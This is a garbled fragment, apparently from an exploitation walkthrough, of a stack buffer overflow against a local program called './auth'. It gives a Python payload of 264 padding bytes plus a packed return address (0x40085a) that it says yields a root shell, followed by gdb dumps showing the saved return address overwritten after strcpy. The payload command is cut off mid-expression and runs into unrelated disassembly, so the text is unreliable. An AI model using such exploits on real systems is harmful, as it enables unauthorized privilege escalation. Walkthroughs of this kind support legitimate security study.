a That would be 0x40085a. b Done. That gives a root shell: $ ./auth "$(python -c 'import struct; print "A"*264+struct.pack(": 48 89 e7 mov rdi,rsp => 0x000000000040082d : e8 0e fe ff ff call 0x400640 (gdb) x /64bx ($rsp+256) 0x7ffe5af18c50: 0x40 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 --> 0x7ffe5af18c58: 0xf2 0x06 0x40 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00 (gdb) ni 15 hash1 = crypt(password,"$6$1122334455667788$"); => 0x0000000000400832 : be 24 09 40 00 mov esi,0x400924 0x0000000000400837 : 48 89 e7 mov rdi,rsp 0x000000000040083a : e8 41 fe ff ff call 0x400680 (gdb) x /64bx ($rsp+256) 0x7ffe5af18c50: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 --> 0x7ffe5af18c58: 0x5a 0x08 0x40 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c60: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c68: 0x45 0x9b 0x05 0x5d 0xdc 0x7f 0x00 0x00 0x7ffe5af18c70: 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x00 0x7ffe5af18c78: 0x48 0x8d 0xf1 0x5a 0xfe 0x7f 0x00 0x00 0x7ffe5af18c80: 0x00 0x00 0x00 0x00 0x02 0x00 0x00 0x00 0x7ffe5af18c88: 0xe0 0x06 0x40 0x00 0x00 0x00 0x00 0x00 The relevant line is marked with -->. Before the strcpy, the correct return address is there. After, there is our own address.